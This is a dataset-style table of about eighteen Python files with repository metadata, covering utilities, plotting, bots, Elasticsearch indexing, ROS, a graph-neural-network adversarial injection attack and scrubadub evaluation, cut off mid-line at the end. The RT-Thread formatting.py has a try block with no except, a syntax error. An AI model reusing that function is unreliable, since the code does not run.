max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
src/common/special_numbers.py | FranzDiebold/project-euler-solutions | 1 | 12761451 | """
Special numbers utility functions.
"""
# pylint: disable=invalid-name
import math
def get_triangle_number(n: int) -> int:
"""Get Triangle number `T_n=n(n+1)/2` for a given number `n`."""
return (n * (n + 1)) // 2
def is_triangle_number(number: int) -> bool:
"""Check if a given number `number` is a triangle number of the form 1/2 * n * (n+1)."""
return ((math.sqrt(8*number + 1) - 1) / 2.0).is_integer()
def get_square_number(n: int) -> int:
"""Get Square number `S_n=n*n` for a given number `n`."""
return n * n
def get_pentagonal_number(n: int) -> int:
"""Get Pentagonal number `P_n=n*(3n−1)/2` for a given number `n`."""
return (n * (3*n - 1)) // 2
def is_pentagonal_number(number: int) -> bool:
"""Check if a given number `number` is a pentagonal number of the form n * (3*n − 1) / 2."""
return ((math.sqrt(24*number + 1) + 1) / 6.0).is_integer()
def get_hexagonal_number(n: int) -> int:
"""Get Hexagonal number `H_n=n*(2n−1)` for a given number `n`."""
return n * (2*n - 1)
def is_hexagonal_number(number: int) -> bool:
"""Check if a given number `number` is a hexagonal number of the form n * (2*n − 1)."""
return ((math.sqrt(8*number + 1) + 1) / 4.0).is_integer()
def get_heptagonal_number(n: int) -> int:
"""Get Heptagonal number `H_n=n*(5n−3)/2` for a given number `n`."""
return (n * (5*n - 3)) // 2
def get_octagonal_number(n: int) -> int:
"""Get Octagonal number `O_n=n*(3n-2)` for a given number `n`."""
return n * (3*n - 2)
| 4.21875 | 4 |
modules/about.py | LFGSaito/OwlBotFAU | 0 | 12761452 | <reponame>LFGSaito/OwlBotFAU
from client import client
import datetime
import discord
import key
cmd_name = "about"
client.basic_help(title=cmd_name, desc=f"returns information about {client.bot_name}")
detailed_help = {
"Usage": f"{client.default_prefix}{cmd_name}",
"Description": "Shows information about the bot.",
# NO Aliases field, this will be added automatically!
}
client.long_help(cmd=cmd_name, mapping=detailed_help)
@client.command(trigger=cmd_name) # aliases is a list of strs of other triggers for the command
async def handle(command: str, message: discord.Message):
embed = discord.Embed(title=f"{client.bot_name} info", description=discord.Embed.Empty, color=0x404040)
embed = embed.add_field(name="Version", value=f"Framework version {client.__version__}\nBot version 0.8")
embed = embed.add_field(name="Creator", value=key.creator)
embed = embed.add_field(name="Github", value=key.github_info)
embed = embed.add_field(name="Built with", value=key.built_with)
embed = embed.add_field(name="Invite Link", value=key.invite_url)
embed = embed.set_footer(text=datetime.datetime.utcnow().__str__())
await message.channel.send(embed=embed)
return
| 2.453125 | 2 |
test_SERVER.py | eelviral/RTC-Data-Streaming | 0 | 12761453 | <filename>test_SERVER.py<gh_stars>0
import unittest
import server
class TestServer(unittest.TestCase):
def test_foo(self):
pass
if __name__ == '__main__':
unittest.main() | 1.679688 | 2 |
dist_deps.py | hboutemy/angular9-example-app-1 | 0 | 12761454 | # Author: <NAME>
# Angular Distribution Dependency Parser
# This is a python script that is placed into an Angular project directory and is run to obtain a list
# of unique npmjs package directories. It parsed the vendor source map header that contains the paths
# to all the files that are pulled in from the node_modules directory by the embedded Angular webpack.
import glob, os
# finds the vendor map in the dist directory when inside the angular project folder (w/ some arbitrary names)
# if there's no vendor map it parses the main source map
try:
path = glob.glob('./dist/*/vendor.*.map')[0]
except IndexError:
print('Vendor source map not found, using main source map.')
try:
path = glob.glob('./dist/*/main.*.map')[0]
except IndexError:
print('No valid source map found.')
quit()
# reads in the file
with open(path, 'r') as f:
vendor_paths = f.read().replace('\n', '')
# chops off the end of the source map header with the vendor directories
vendor_paths = vendor_paths.split(']')[0]
# chops off the opener to give all the paths dilimited by commas
vendor_paths = vendor_paths.split('[')[1]
# splits by commas
vendor_paths = vendor_paths.split(',')
package_dirs = set()
for path in vendor_paths:
# further cuts to include only the relative path starting with the node_modules directory
path = path[12:-1]
print(path)
# running ng build with the --build-optimizer flag appends this to the end of the file in the source map
if path.endswith('.pre-build-optimizer.js'):
path = path.replace('.pre-build-optimizer.js','')
# checks if the file actually exists
if not os.path.isfile(path):
print('The following file was not found: ', path)
continue
# gets directory containing the source map file
parent_dir = os.path.dirname(path)
# loop to traverse up the path terminating at the node_modules directory
while(parent_dir != './node_modules'):
# checks to prevent infinite loop if the path doesn't have a node_modules directory
if parent_dir == '.' or parent_dir == '':
print('The following path is not in a node_modules directory: ', path)
break
# checks if a package.json exists in the directory, adds to the set of package directorys, and breaks
if os.path.isfile(parent_dir + '/package.json'):
package_dirs.add(parent_dir)
#print(parent_dir)
break
# progresses the loop by getting the next parent directory
parent_dir = os.path.dirname(parent_dir)
# checks if the loops terminates with no breaks (it hit the node_modules)
else:
print('No package.json file was found anywhere in the following path: ', path)
# opens/overwrites output file to be passed into the iq server cli
out_file = open('package_dirs.txt', 'w+')
# prints package directories and writes to file
print('This is the set of unique package directories for files defined in the vendor source map: ')
for package_path in package_dirs:
out_file.write(package_path + '\n')
print(package_path)
out_file.close()
| 2.40625 | 2 |
setup.py | Euromance/pynote | 0 | 12761455 | <filename>setup.py
import setuptools
VERSION = '0.1.6'
setuptools.setup(
name='pynote',
packages=setuptools.find_packages(),
version=VERSION,
description='Note taking app.',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
url='https://github.com/Euromance/pynote',
author='Euromance',
author_email='<EMAIL>',
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.9',
'License :: OSI Approved :: MIT License',
],
project_urls={
'Repository': 'https://github.com/Euromance/pynote',
},
python_requires='>=3.9,<4',
install_requires=[
'confboy>=0.2.0,<1.0.0',
'typer[all]>=0.3.0,<1.0.0',
],
extras_require={
'dev': [
'flake8-commas==2.0.0',
'flake8-import-order==0.18.1',
'flake8-quotes==3.2.0',
'flake8==3.9.1',
'pep8-naming==0.11.1',
],
'test': [
'pytest-cov==2.11.1',
'pytest-mock==3.5.1',
'pytest==6.2.2',
],
},
entry_points={
'console_scripts': [
'note=pynote:app',
],
},
)
| 1.398438 | 1 |
controller/plot_step_and_weights.py | romenr/bachelorthesis | 2 | 12761456 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import h5py
import matplotlib.pyplot as plt
from matplotlib import gridspec
from os import path
import parameters as param
import argparse
import pandas as pd
ewma = pd.stats.moments.ewma
# Configure Command Line interface
controller = dict(tf="target following controller", oa="obstacle avoidance controller")
parser = argparse.ArgumentParser(description='Plot the final weights and show it in a Window')
parser.add_argument('controller', choices=controller, default='oa', help="tf - target following, oa - obstacle avoidance")
parser.add_argument('-n', '--noShow', help='Do not show the resulting Plot in a window', action="store_true")
parser.add_argument('dir', help='Base directory of the experiment eg. ./data/session_xyz', default=param.default_dir)
args = parser.parse_args()
print "Using", controller[args.controller]
is_oa = args.controller == 'oa'
if is_oa:
h5f = h5py.File(path.join(args.dir, param.training_file_oa), 'r')
w = np.array(h5f['w_oa'], dtype=float)
w_l = w[:, 0]
w_r = w[:, 1]
w_i = range(0, w_l.shape[0])
dopamine = np.array(h5f['reward'], dtype=float)[:, 2]
else:
h5f = h5py.File(path.join(args.dir, param.training_file_tf), 'r')
w = np.array(h5f['w_tf'], dtype=float)
w_l = w[:, 0]
w_l = w_l.reshape(w_l.shape[0], -1)
w_r = w[:, 1]
w_r = w_r.reshape(w_r.shape[0], -1)
w_i = range(0, w_l.shape[0])
dopamine = np.array(h5f['reward'], dtype=float)[:, 0]
episode_steps = np.array(h5f["episode_steps"], dtype=int)
episode_completed = np.array(h5f['episode_completed'], dtype=bool)
episode_completed = episode_completed[episode_steps > 5]
episode_steps = episode_steps[episode_steps > 5]
#dopamine = np.array(h5f["target_pos"], dtype=float)
values_x = np.array(range(episode_steps.size))
success_y = episode_steps[episode_completed]
success_x = values_x[episode_completed]
failures_y = episode_steps[~episode_completed]
failures_x = values_x[~episode_completed]
# retrieve the dat
steps =episode_steps
# Plot
fig= plt.subplots(figsize=(9, 14))
gs = gridspec.GridSpec(1, 1, height_ratios=[1])
ax_1 = plt.subplot(411)
xlim1 = steps.size
ylim1 = steps.max(axis=0)*1.1
plt.plot(steps, lw=2, color='darkorange')
ax_1.set_xlim((0, xlim1))
ax_1.set_ylim((0, ylim1))
ax_1.set_ylabel('Time Steps')
ax_1.set_xlabel('Episode')
plt.grid()
plt.axhline(y=np.average(steps[steps > 400]), color='green', lw=3, linestyle='--')
for item in ([ax_1.title, ax_1.xaxis.label, ax_1.yaxis.label] + ax_1.get_xticklabels() + ax_1.get_yticklabels()):
item.set_fontsize(16)
ax_1.scatter(success_x, success_y, marker='^', color='g', s=12)
ax_1.scatter(failures_x, failures_y, marker='x', color='r', s=12)
ax_2 = plt.subplot(412)
span_value = 20
time_step = np.arange(0, dopamine.size)
fwd = ewma(dopamine, span=span_value)
bwd = ewma(dopamine[::-1], span=span_value)
c = np.vstack((fwd, bwd[::-1]))
c = np.mean(c, axis=0)
ax_2.set_ylabel('Dopamine Reward')
# ax_2.set_xlabel('Time Steps')
plt.plot(time_step, dopamine, lw=2, color='b', alpha=0.3)
plt.plot(time_step, c, lw=1, color='b')
for item in ([ax_2.title, ax_2.xaxis.label, ax_2.yaxis.label] + ax_2.get_xticklabels() + ax_2.get_yticklabels()):
item.set_fontsize(16)
xlim = w_i[-1]
ymin1 = param.w_min
ymax1 = param.w_max
ax_3 = plt.subplot(413, sharex=ax_2)
# ax_3.set_title('Weights to left neuron', color='0.4')
ax_3.set_ylabel('Weight to Left Neuron')
ax_3.set_xlim((0,xlim))
ax_3.set_ylim((ymin1, ymax1))
plt.grid(True)
ax_3.tick_params(axis='both', which='both', direction='in', bottom=True, top=True, left=True, right=True)
print w_l.shape, w_l[-1]
for i in range(w_l.shape[1]):
plt.plot(w_i, w_l[:,i])
for item in ([ax_3.title, ax_3.xaxis.label, ax_3.yaxis.label] + ax_3.get_xticklabels() + ax_3.get_yticklabels()):
item.set_fontsize(16)
#if is_oa:
# ax_3.legend([u'Left 60°', u'Left 30°', u'Right 30°', u'Right 60°'])
ymin2 = param.w_min
ymax2 = param.w_max
ax_4 = plt.subplot(414, sharex=ax_3)
# ax_4.set_title('Weights to right neuron', color='0.4')
ax_4.set_ylabel('Weight to Right Neuron')
ax_4.set_xlim((0,xlim))
ax_4.set_ylim((ymin2,ymax2))
plt.grid(True)
ax_4.tick_params(axis='both', which='both', direction='in', bottom=True, top=True, left=True, right=True)
for i in range(w_r.shape[1]):
plt.plot(w_i, w_r[:,i])
ax_4.set_xlabel('Simulation Time [1 step = 50 ms]')
for item in ([ax_4.title, ax_4.xaxis.label, ax_4.yaxis.label] + ax_4.get_xticklabels() + ax_4.get_yticklabels()):
item.set_fontsize(16)
plt.grid(True)
plt.subplots_adjust(wspace=0., hspace=0.3, right=0.96, left=0.16, bottom=0.06, top=0.96)
if is_oa:
plt.savefig(path.join(args.dir, "training_oa.pdf"), bbox_inches='tight')
else:
plt.savefig(path.join(args.dir, "training_tf.pdf"), bbox_inches='tight')
plt.show()
| 2.4375 | 2 |
tools/formatting.py | rtthread-bot/rt-thread | 15 | 12761457 | <filename>tools/formatting.py
#
# File : formatting.py
# This file is part of RT-Thread RTOS
# COPYRIGHT (C) 2006 - 2018, RT-Thread Development Team
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Change Logs:
# Date Author Notes
# 2021-03-02 <NAME> The first version
# 2021-03-04 <NAME> 增加统一转换成UTF-8编码格式功能
#本文件会自动对指定路径下的所有文件包括子文件夹的文件(仅针对.c.h)进行扫描
# 1)将源文件编码统一为UTF-8;
# 2)将TAB键替换为空格;
# 3)将每行末尾多余的空格删除,并统一换行符为'\n';
#使用时只需要双击本文件,输入要扫描的文件夹路径即可
#不能保证100%全部成功转换为UTF-8,有一些编码特殊或识别不准确会在终端打印信息,需人工转换
#欢迎对本文件的功能继续做出补充,欢迎提交PR
import os
import chardet
#用空格代替TAB键
#这里并不是简单的将TAB替换成4个空格
#空格个数到底是多少需要计算,因为TAB制表本身有自动对齐的功能
def tab2spaces(line):
list_str = list(line) #字符串打散成列表,放边操作
i = list_str.count('\t')
while i > 0:
ptr = list_str.index('\t')
del list_str[ptr]
space_need_to_insert = 4 - (ptr%4)
j = 0
while j < space_need_to_insert:
list_str.insert(ptr,' ')
j = j+1
i = i-1
line = ''.join(list_str) #列表恢复成字符串
return line
#删除每行末尾多余的空格 统一使用\n作为结尾
def formattail(line):
line = line.rstrip()
line = line + '\n'
return line
#对单个文件进行格式整理
def format_codes(filename):
try:
file=open(filename,'r',encoding = 'utf-8')
file_temp=open('temp','w',encoding = 'utf-8')
for line in file:
line = tab2spaces(line)
line = formattail(line)
file_temp.write(line)
file_temp.close()
file.close()
os.remove(filename)
os.rename('temp',filename)
def get_encode_info(file):
with open(file, 'rb') as f:
code = chardet.detect(f.read())['encoding']
#charde库有一定几率对当前文件的编码识别不准确
if code == 'EUC-JP': #容易将含着少量中文的英文字符文档识别为日语编码格式
code = 'GB2312'
elif code == 'ISO-8859-1': #部分文件GB2312码会被识别成ISO-8859-1
code = 'GB2312'
if not (code == 'ascii' or code == 'utf-8' or code == 'GB2312' #编码识别正确
or code == 'Windows-1252'): # Windows-1252 是由于意法半导体是法国企业's的'是法语的'导致的
if code != None:
print('未处理,需人工确认:'+code+':'+file) #需要人工确认
code = None
return code
#将单个文件转为UTF-8编码
def conver_to_utf_8 (path):
try:
info = get_encode_info(path)
if info == None:
return 0 #0 失败
file=open(path,'rb+')
data = file.read()
string = data.decode(info)
utf = string.encode('utf-8')
file.seek(0)
file.write(utf)
file.close()
return 1 #1成功
except UnicodeDecodeError:
print("UnicodeDecodeError未处理,需人工确认"+path)
return 0
except UnicodeEncodeError:
print("UnicodeEncodeError未处理,需人工确认"+path)
return 0
# 递归扫描目录下的所有文件
def traversalallfile(path):
filelist=os.listdir(path)
for file in filelist:
filepath=os.path.join(path,file)
if os.path.isdir(filepath):
traversalallfile(filepath)
elif os.path.isfile(filepath):
if filepath.endswith(".c") == True or filepath.endswith(".h") == True: #只处理.c和.h文件
if conver_to_utf_8(filepath) == 1: #先把这个文件转为UTF-8编码,1成功
format_codes(filepath) #再对这个文件进行格式整理
def formatfiles():
workpath = input('enter work path: ')
traversalallfile(workpath)
if __name__ == '__main__':
formatfiles()
| 1.820313 | 2 |
expense_tracker/__init__.py | TClaypool00/ExpenseTrackerClient-Python | 0 | 12761458 | import pymysql
pymysql.version_info = (1,4,0, "final", 0)
pymysql.install_as_MySQLdb() | 1.46875 | 1 |
src/elasticsearch/create_doc_index.py | jhunhwang/goldenretriever | 8 | 12761459 | <reponame>jhunhwang/goldenretriever<filename>src/elasticsearch/create_doc_index.py
""""""
"""
Version:
--------
0.1 11th May 2020
Usage:
------
Script to handle indexing of QnA datasets into Elasticsearch for downstream finetuning and serving
- Define index schema using elasticsearch_dsl classes
- Connect and upload Documents to Elasticsearch
"""
from datetime import datetime
from elasticsearch_dsl import Index, Document, InnerDoc, Date, Nested, Keyword, Text, Integer, connections
from argparse import ArgumentParser
import pandas as pd
def upload_docs(qa_pairs):
"""
adds document with qa pair to elastic index
assumes that index fields correspond to template in create_doc_index.py
:param full_text: full text of document containing answer
:param qa_pairs: list of dictionaries with key:value='ans_id':integer, 'ans_str':str, 'query_str'=str, 'query_id'=integer
:return: document and qa_pair indexed to Elastic
"""
print('uploading docs')
counter = 0
for pair in qa_pairs:
first = Doc(doc=pair['ans_str'])
first.add_qa_pair(pair['ans_id'], pair['ans_str'], pair['query_id'], pair['query_str'])
first.save()
counter += 1
print("indexing finished")
print(f'indexed {counter} documents')
if __name__ == '__main__':
parser = ArgumentParser(description='index qa dataset to Elasticsearch')
parser.add_argument('url', help='elasticsearch url')
parser.add_argument('csv_file', help='csv file with qa pairs')
parser.add_argument('index_name', help='name of index to create')
args = parser.parse_args()
index = Index(args.index_name)
index.settings = {"number_of_shards": 1,
"number_of_replicas": 0}
# index schema
class QA(InnerDoc):
ans_id = Integer()
ans_str = Text(fields={'raw': Keyword()})
query_id = Integer()
query_str = Text()
@index.document
class Doc(Document):
doc = Text()
created_at = Date()
qa_pair = Nested(QA)
def add_qa_pair(self, ans_id, ans_str, query_id, query_str):
self.qa_pair.append(QA(ans_id=ans_id, ans_str=ans_str, query_id=query_id, query_str=query_str))
def save(self, **kwargs):
self.created_at = datetime.now()
return super().save(**kwargs)
# connect to ES instance and start indexing
connections.create_connection(hosts=[args.url])
qa_pairs = pd.read_csv(args.csv_file).fillna('nan').to_dict('records')
counter = upload_docs(qa_pairs)
| 2.828125 | 3 |
Basic/25_list_and_dict_comprehension/list_comprehension.py | reskimulud/Python | 1 | 12761460 | # List Comprehension
# adalah metode untuk menambahkan anggota dari suatu list melalui for loop
# Syntax dari List Comprehension adalah
# [expression for item in iterable]
# Original List
original = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print(f"Original : {original}")
# Output = Original : [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
# Implementasi List Comprehension dengan Iterable
original_dua = [value for value in range(5, 11)]
print(f"Original Range : {original_dua}")
# Output = Original Range : [5, 6, 7, 8, 9, 10]
# Implementasi List Comprehension dengan Pemangkatan (Exponential)
exp_list = [item**2 for item in original]
print(f"Exponent List : {exp_list}")
# Output = Exponent List : [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]
# Implementasi List Comprehension dengan If Else
genap = [item for item in original if item % 2 == 0]
print(f"Genap : {genap}")
# Output = Genap : [2, 4, 6, 8, 10]
# Implementasi List Comprehension dengan Expression
elemen = ["Api", "Air", "Tanah", "Udara"]
huruf_awal = [item[0] for item in elemen]
print(f"Huruf Awal : {huruf_awal}")
# Output = Huruf Awal : ['A', 'A', 'T', 'U']
| 4.28125 | 4 |
graphwar/attack/injection/adv_injection.py | EdisonLeeeee/GraphWar | 10 | 12761461 | from copy import copy
from typing import Optional, Union
import numpy as np
import torch
import torch.nn.functional as F
from torch import Tensor
from torch.autograd import grad
from tqdm import tqdm
from graphwar import Surrogate
from graphwar.attack.injection.injection_attacker import InjectionAttacker
class AdvInjection(InjectionAttacker, Surrogate):
r"""2nd place solution of KDD CUP 2020
"Adversarial attack and defense" challenge.
Example
-------
>>> from graphwar.dataset import GraphWarDataset
>>> import torch_geometric.transforms as T
>>> dataset = GraphWarDataset(root='~/data/pygdata', name='cora',
transform=T.LargestConnectedComponents())
>>> data = dataset[0]
>>> surrogate_model = ... # train your surrogate model
>>> from graphwar.attack.injection import AdvInjection
>>> attacker.setup_surrogate(surrogate_model)
>>> attacker = AdvInjection(data)
>>> attacker.reset()
>>> attacker.attack(10, feat_limits=(0, 1)) # injecting 10 nodes for continuous features
>>> attacker.reset()
>>> attacker.attack(10, feat_budgets=10) # injecting 10 nodes for binary features
>>> attacker.data() # get attacked graph
>>> attacker.injected_nodes() # get injected nodes after attack
>>> attacker.injected_edges() # get injected edges after attack
>>> attacker.injected_feats() # get injected features after attack
Note
----
* Please remember to call :meth:`reset` before each attack.
"""
def attack(self, num_budgets: Union[int, float], *,
targets: Optional[Tensor] = None,
interconnection: bool = False,
lr: float = 0.01,
num_edges_global: Optional[int] = None,
num_edges_local: Optional[int] = None,
feat_limits: Optional[Union[tuple, dict]] = None,
feat_budgets: Optional[int] = None,
disable: bool = False) -> "AdvInjection":
super().attack(num_budgets, targets=targets,
num_edges_global=num_edges_global,
num_edges_local=num_edges_local,
feat_limits=feat_limits,
feat_budgets=feat_budgets)
candidate_nodes = self.targets.tolist()
edge_index, edge_weight, feat = self.edge_index, self.edge_weight, self.feat
if edge_weight is None:
edge_weight = feat.new_ones(edge_index.size(1))
feat_min, feat_max = self.feat_limits
feat_limits = max(abs(feat_min), feat_max)
feat_budgets = self.feat_budgets
injected_feats = None
for injected_node in tqdm(range(self.num_nodes, self.num_nodes+self.num_budgets),
desc="Injecting nodes...",
disable=disable):
injected_edge_index = np.stack(
[np.tile(injected_node, len(candidate_nodes)), candidate_nodes], axis=0)
injected_edge_index = torch.as_tensor(
injected_edge_index).to(edge_index)
injected_edge_weight = edge_weight.new_zeros(
injected_edge_index.size(1)).requires_grad_()
injected_feat = feat.new_zeros(1, self.num_feats)
if injected_feats is None:
injected_feats = injected_feat.requires_grad_()
else:
injected_feats = torch.cat(
[injected_feats, injected_feat], dim=0).requires_grad_()
edge_grad, feat_grad = self.compute_gradients(
feat, edge_index, edge_weight,
injected_feats, injected_edge_index, injected_edge_weight,
targets=self.targets, target_labels=self.target_labels)
topk_edges = torch.topk(edge_grad, k=self.num_edges_local).indices
injected_edge_index = injected_edge_index[:, topk_edges]
self.inject_node(injected_node)
self.inject_edges(injected_edge_index)
with torch.no_grad():
edge_index = torch.cat(
[edge_index, injected_edge_index, injected_edge_index.flip(0)], dim=1)
edge_weight = torch.cat(
[edge_weight, edge_weight.new_ones(injected_edge_index.size(1)*2)], dim=0)
if feat_budgets is not None:
topk = torch.topk(
feat_grad, k=feat_budgets, dim=1)
injected_feats.data.fill_(0.)
injected_feats.data.scatter_(
1, topk.indices, 1.0)
else:
injected_feats.data = (
feat_limits * feat_grad.sign()).clamp(min=feat_min, max=feat_max)
if interconnection:
candidate_nodes.append(injected_node)
self._injected_feats = injected_feats.data
return self
def compute_gradients(self, x, edge_index, edge_weight,
injected_feats, injected_edge_index,
injected_edge_weight,
targets, target_labels):
x = torch.cat([x, injected_feats], dim=0)
edge_index = torch.cat(
[edge_index, injected_edge_index, injected_edge_index.flip(0)], dim=1)
edge_weight = torch.cat(
[edge_weight, injected_edge_weight.repeat(2)], dim=0)
logit = self.surrogate(x, edge_index, edge_weight)[targets] / self.eps
loss = F.cross_entropy(logit, target_labels)
return grad(loss, [injected_edge_weight, injected_feats], create_graph=False)
| 2.25 | 2 |
tests/test_horizontal_rule.py | u8slvn/MarkdownIO | 3 | 12761462 | from markdownio import block
def test_linebreak(document):
elem = block.HorizontalRule()
document.add(elem)
assert "---\n" == document.output()
| 2.609375 | 3 |
src/translate_winogender.py | alexissavva/NLP | 31 | 12761463 | """ Usage:
<file-name> --in=IN_FILE --langs=LANGUAGES --out=OUT_FILE [--debug]
"""
# External imports
import logging
import pdb
from pprint import pprint
from pprint import pformat
from docopt import docopt
from collections import defaultdict
from operator import itemgetter
from tqdm import tqdm
# Local imports
from google_translate import google_translate
#=-----
if __name__ == "__main__":
# Parse command line arguments
args = docopt(__doc__)
inp_fn = args["--in"]
langs = args["--langs"].split(",")
out_fn = args["--out"]
debug = args["--debug"]
if debug:
logging.basicConfig(level = logging.DEBUG)
else:
logging.basicConfig(level = logging.INFO)
logging.info(f"Writing output to {out_fn}")
with open(out_fn, "w", encoding = "utf8") as fout:
fout.write("\t".join(["sentid", "sentence"] + langs) + "\n")
lines = [line.strip() for line in open(inp_fn, encoding = "utf8")]
for line in tqdm(lines[1:]):
sentid, sent = line.strip().split("\t")
trans = [google_translate([sent], "en", target_lang)[0]["translatedText"]
for target_lang in langs]
fout.write("\t".join([sentid, sent] + trans) + "\n")
logging.info("DONE")
| 2.6875 | 3 |
nwb_conversion_tools/datainterfaces/ecephys/spikeinterface/sipickledatainterfaces.py | Saksham20/nwb-conversion-tools | 0 | 12761464 | """Authors: <NAME>."""
from spikeextractors import load_extractor_from_pickle
from ..baserecordingextractorinterface import BaseRecordingExtractorInterface
from ..basesortingextractorinterface import BaseSortingExtractorInterface
from ....utils import FilePathType
class SIPickleRecordingExtractorInterface(BaseRecordingExtractorInterface):
"""Primary interface for reading and converting SpikeInterface Recording objects through .pkl files."""
RX = None
def __init__(self, file_path: FilePathType):
self.recording_extractor = load_extractor_from_pickle(pkl_file=file_path)
self.subset_channels = None
self.source_data = dict(file_path=file_path)
class SIPickleSortingExtractorInterface(BaseSortingExtractorInterface):
"""Primary interface for reading and converting SpikeInterface Sorting objects through .pkl files."""
SX = None
def __init__(self, file_path: FilePathType):
self.sorting_extractor = load_extractor_from_pickle(pkl_file=file_path)
self.source_data = dict(file_path=file_path)
| 2.34375 | 2 |
cli/skyline/__main__.py | danielsnider/ecosystem-project-website-template | 23 | 12761465 | <reponame>danielsnider/ecosystem-project-website-template
import argparse
import enum
import sys
import skyline
import skyline.commands.interactive
import skyline.commands.memory
import skyline.commands.time
def main():
parser = argparse.ArgumentParser(
prog="skyline",
description="Skyline: Interactive Neural Network Performance "
"Profiler, Visualizer, and Debugger for PyTorch",
)
parser.add_argument(
"-v", "--version",
action="store_true",
help="Print the version and exit.",
)
subparsers = parser.add_subparsers(title="Commands")
skyline.commands.interactive.register_command(subparsers)
skyline.commands.memory.register_command(subparsers)
skyline.commands.time.register_command(subparsers)
args = parser.parse_args()
if args.version:
print('Skyline Command Line Interface', 'v' + skyline.__version__)
return
if 'func' not in args:
parser.print_help()
sys.exit(1)
# Run the specified command
args.func(args)
if __name__ == '__main__':
main()
| 2.640625 | 3 |
mission/finite_state_machine/scripts/go_to_and_inspect_pt_sm.py | theBadMusician/Vortex-AUV | 25 | 12761466 | #!/usr/bin/env python
import rospy
import numpy as np
from smach import State, StateMachine, Sequence
from smach_ros import SimpleActionState, MonitorState, IntrospectionServer
# action message
import actionlib
from actionlib_msgs.msg import GoalStatus
from geometry_msgs.msg import Pose, Point, Quaternion, PoseStamped
from nav_msgs.msg import OccupancyGrid, Odometry
from nav_msgs.srv import GetPlan, GetMap
from tf.transformations import quaternion_from_euler, euler_from_quaternion
from visualization_msgs.msg import Marker, MarkerArray
from vortex_msgs.msg import MoveAction, MoveGoal
def makeMoveGoal(contr_name, target_x, target_y, target_z, radius_of_acceptance = 0.2):
"""
string controller_name
geometry_msgs/Pose target_pose
float32 radius_of_acceptance
---
---
"""
move_goal = MoveGoal()
move_goal.controller_name = contr_name
move_goal.target_pose.position.x = target_x
move_goal.target_pose.position.y = target_y
move_goal.target_pose.position.z = target_z
move_goal.radius_of_acceptance = radius_of_acceptance
return move_goal
class TaskManager():
def __init__(self):
rospy.init_node('move_to_and_inspect_point_sm', anonymous=False)
hsm = StateMachine(outcomes=['finished statemachine'])
with hsm:
StateMachine.add( 'GO_TO_POINT',
SimpleActionState( 'pid_global',
MoveAction,
makeMoveGoal("pid_global_plan", -3.0, 0, -0.5, radius_of_acceptance = 2.0)),
transitions = { "succeeded": 'INSPECT_POINT',
"preempted": 'INSPECT_POINT',
"aborted": 'INSPECT_POINT' })
StateMachine.add( 'INSPECT_POINT',
SimpleActionState( 'inspect_point',
MoveAction,
makeMoveGoal("inspect_point", -3.0, 0.0, -0.5, radius_of_acceptance=2.0)),
transitions = { 'succeeded': 'INSPECT_POINT',
"preempted": 'INSPECT_POINT',
"aborted": 'INSPECT_POINT' })
intro_server = IntrospectionServer(str(rospy.get_name()), hsm,'/SM_ROOT')
intro_server.start()
hsm.execute()
#patrol.execute()
print("State machine execute finished")
intro_server.stop()
def shutdown(self):
rospy.loginfo("stopping the AUV...")
rospy.sleep(10)
if __name__ == '__main__':
try:
TaskManager()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("Pathplanning state machine has been finished") | 2.09375 | 2 |
scrubadub/comparison.py | Jomcgi/scrubadub | 0 | 12761467 | import re
import copy
import random
from faker import Faker
from . import filth as filth_module
from .filth import Filth
from .detectors.known import KnownFilthItem
from typing import List, Dict, Union, Optional, Tuple
import pandas as pd
import sklearn.metrics
def get_filth_classification_report(
filth_list: List[Filth],
output_dict: bool = False,
) -> Optional[Union[str, Dict[str, float]]]:
"""Evaluates the performance of detectors using KnownFilth.
An example of using this is shown below:
.. code:: pycon
>>> import scrubadub, scrubadub.comparison, scrubadub.detectors.text_blob
>>> scrubber = scrubadub.Scrubber(detector_list=[
... scrubadub.detectors.TextBlobNameDetector(name='name_detector'),
... scrubadub.detectors.KnownFilthDetector([
... {'match': 'Tom', 'filth_type': 'name'},
... {'match': '<EMAIL>', 'filth_type': 'email'},
... ]),
... ])
>>> filth_list = list(scrubber.iter_filth("Hello I am Tom"))
>>> print(scrubadub.comparison.get_filth_classification_report(filth_list))
filth detector locale precision recall f1-score support
<BLANKLINE>
name name_detector en_US 1.00 1.00 1.00 1
<BLANKLINE>
accuracy 1.00 1
macro avg 1.00 1.00 1.00 1
weighted avg 1.00 1.00 1.00 1
<BLANKLINE>
:param filth_list: The list of detected filth
:type filth_list: A list of `Filth` objects
:param output_dict: Return the report in JSON format, defautls to False
:type output_dict: bool, optional
:return: The report in JSON (a `dict`) or in plain text
:rtype: `str` or `dict`
"""
results = [] # type: List[Dict[str, int]]
filth_max_length = 0
detector_name_max_length = 0
locale_max_length = 0
for filth_item in filth_list:
sub_filths = [filth_item]
if isinstance(filth_item, filth_module.base.MergedFilth):
sub_filths = filth_item.filths
results_row = {}
for sub_filth in sub_filths:
if isinstance(sub_filth, filth_module.KnownFilth) and sub_filth.comparison_type is not None:
results_row[
'{}:{}:{}'.format(sub_filth.comparison_type, filth_module.KnownFilth.type, sub_filth.locale)] = 1
else:
try:
results_row['{}:{}:{}'.format(sub_filth.type, sub_filth.detector_name, sub_filth.locale)] = 1
except AttributeError:
print(type(sub_filth), sub_filth)
raise
# Dont include filth that was not produced by one of the detectors of interest
if sum(results_row.values()) > 0:
results.append(results_row)
if len(results) == 0:
return None
results_df = pd.DataFrame(results).fillna(0).astype(int)
results_df.columns = pd.MultiIndex.from_tuples(
